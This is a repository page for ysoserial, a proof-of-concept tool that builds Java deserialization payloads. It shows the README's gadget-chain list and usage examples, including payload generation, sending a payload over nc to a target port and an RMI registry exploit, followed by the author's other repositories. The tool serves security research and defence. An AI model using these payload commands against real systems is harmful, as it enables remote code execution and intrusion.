• Stars
    star
    7,580
  • Rank 5,067 (Top 0.1 %)
  • Language
    Java
  • License
    MIT License
  • Created almost 10 years ago
  • Updated 8 months ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.

ysoserial

GitHub release Travis Build Status Appveyor Build status

A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.

logo

Description

Originally released as part of AppSecCali 2015 Talk "Marshalling Pickles: how deserializing objects will ruin your day" with gadget chains for Apache Commons Collections (3.x and 4.x), Spring Beans/Core (4.x), and Groovy (2.3.x). Later updated to include additional gadget chains for JRE <= 1.7u21 and several other libraries.

ysoserial is a collection of utilities and property-oriented programming "gadget chains" discovered in common java libraries that can, under the right conditions, exploit Java applications performing unsafe deserialization of objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain will automatically be invoked and cause the command to be executed on the application host.

It should be noted that the vulnerability lies in the application performing unsafe deserialization and NOT in having gadgets on the classpath.

Disclaimer

This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.

Usage

$  java -jar ysoserial.jar
Y SO SERIAL?
Usage: java -jar ysoserial.jar [payload] '[command]'
  Available payload types:
     Payload             Authors                     Dependencies
     -------             -------                     ------------
     AspectJWeaver       @Jang                       aspectjweaver:1.9.2, commons-collections:3.2.2
     BeanShell1          @pwntester, @cschneider4711 bsh:2.0b5
     C3P0                @mbechler                   c3p0:0.9.5.2, mchange-commons-java:0.2.11
     Click1              @artsploit                  click-nodeps:2.3.0, javax.servlet-api:3.1.0
     Clojure             @JackOfMostTrades           clojure:1.8.0
     CommonsBeanutils1   @frohoff                    commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
     CommonsCollections1 @frohoff                    commons-collections:3.1
     CommonsCollections2 @frohoff                    commons-collections4:4.0
     CommonsCollections3 @frohoff                    commons-collections:3.1
     CommonsCollections4 @frohoff                    commons-collections4:4.0
     CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1
     CommonsCollections6 @matthias_kaiser            commons-collections:3.1
     CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
     FileUpload1         @mbechler                   commons-fileupload:1.3.1, commons-io:2.4
     Groovy1             @frohoff                    groovy:2.3.9
     Hibernate1          @mbechler
     Hibernate2          @mbechler
     JBossInterceptors1  @matthias_kaiser            javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
     JRMPClient          @mbechler
     JRMPListener        @mbechler
     JSON1               @mbechler                   json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
     JavassistWeld1      @matthias_kaiser            javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
     Jdk7u21             @frohoff
     Jython1             @pwntester, @cschneider4711 jython-standalone:2.5.2
     MozillaRhino1       @matthias_kaiser            js:1.7R2
     MozillaRhino2       @_tint0                     js:1.7R2
     Myfaces1            @mbechler
     Myfaces2            @mbechler
     ROME                @mbechler                   rome:1.0
     Spring1             @frohoff                    spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
     Spring2             @mbechler                   spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
     URLDNS              @gebl
     Vaadin1             @kai_ullrich                vaadin-server:7.7.14, vaadin-shared:7.7.14
     Wicket1             @jacob-baines               wicket-util:6.23.0, slf4j-api:1.6.4

Examples

$ java -jar ysoserial.jar CommonsCollections1 calc.exe | xxd
0000000: aced 0005 7372 0032 7375 6e2e 7265 666c  ....sr.2sun.refl
0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41  ect.annotation.A
0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174  nnotationInvocat
...
0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76  vr..java.lang.Ov
0000560: 6572 7269 6465 0000 0000 0000 0000 0000  erride..........
0000570: 0078 7071 007e 003a                      .xpq.~.:

$ java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
$ nc 10.10.10.10 1099 < groovypayload.bin

$ java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe

Installation

GitHub release

Download the latest release jar from GitHub releases.

Building

Requires Java 1.7+ and Maven 3.x+

mvn clean package -DskipTests

Code Status

Build Status Build status

Contributing

  1. Fork it
  2. Create your feature branch (git checkout -b my-new-feature)
  3. Commit your changes (git commit -am 'Add some feature')
  4. Push to the branch (git push origin my-new-feature)
  5. Create new Pull Request

See Also

More Repositories

1

jdk8u-jdk

Java
205
star
2

ciphr

CLI crypto swiss-army knife for performing and composing encoding, decoding, encryption, decryption, hashing, and other various cryptographic operations on streams of data from the command line; mostly intended for ad hoc, infosec-related uses.
Ruby
115
star
3

inspector-gadget

Primitive tool for exploring/querying Java classes via the Tinkerpop Gremlin graph traversal language
Java
103
star
4

grepcidr

from http://www.pc-tools.net/unix/grepcidr/
C
89
star
5

jdk8u-dev-jdk

Java
68
star
6

jdeserialize

From https://code.google.com/p/jdeserialize/
Java
34
star
7

rails_exploits

Ruby
22
star
8

serialysis

from http://weblogs.java.net/blog/emcmanus/archive/2007/06/disassembling_s.html
Java
10
star
9

appseccali-java

Java
9
star
10

pd-buddy-wye

From https://git.clarahobbs.com/pd-buddy/pd-buddy-wye.git
8
star
11

ctfd-trektheme

Star Trek LCARS inspired pure CSS theme for CTFd (v2.1.1) used during the 2019 LayerOne CTF and ToorCon CTF.
CSS
7
star
12

inyourface

From http://www.synacktiv.com/ressources/inyourface-0.2.tar.gz
Java
7
star
13

appseccali-marshalling-pickles

Slide deck from AppSecCali 2015 Talk "Marshalling Pickles: how deserializing objects will ruin your day"
CSS
6
star
14

sleepyhead

imported from https://sourceforge.net/projects/sleepyhead/
C++
6
star
15

grepcidr2

from http://www.taugh.com/grepcidr-2/
C
5
star
16

owaspsd-deserialize-my-shorts

Slide deck from OWASP SD Talk "Deserialize My Shorts: Or How I Learned to Start Worrying and Hate Java Object Deserialization"
CSS
5
star
17

burp-plugin-requestutils

Plugin for manipulating requests in PortSwigger Burp Suite Pro v1.5+
Java
4
star
18

jimmix

From http://www.synacktiv.com/ressources/jimmix-0.3.tar.gz
Java
4
star
19

jdk7u

Java
3
star
20

shellshock-pocs

Perl
2
star
21

jmitm2

From http://www.david-guembel.de/uploads/media/jmitm2-0.1.0-source.tar.gz
Java
2
star
22

jdk6

Java
2
star
23

dotfiles

Shell
1
star
24

pwdagent

A barebones CLI utility to prompt for and cache a password in memory, then hand it out over HTTP or raw TCP
Ruby
1
star
25

burp-debug

Java
1
star
26

ircbots

Scala
1
star
27

reserializer

Java
1
star
28

privilegedaccessor

From https://code.google.com/p/privilegedaccessor/
Java
1
star
29

frohoff.github.io

Github Pages Site
CSS
1
star
30

lambda-zip-test

docker run -v [homedir]/.aws/:/root/.aws/ -e AWS_DEFAULT_PROFILE=[profilename] [containerid]
Shell
1
star
31

appseccali-rails-redis

Ruby
1
star
32

java-suid-exec

Break glass in case of suid java executable.
Java
1
star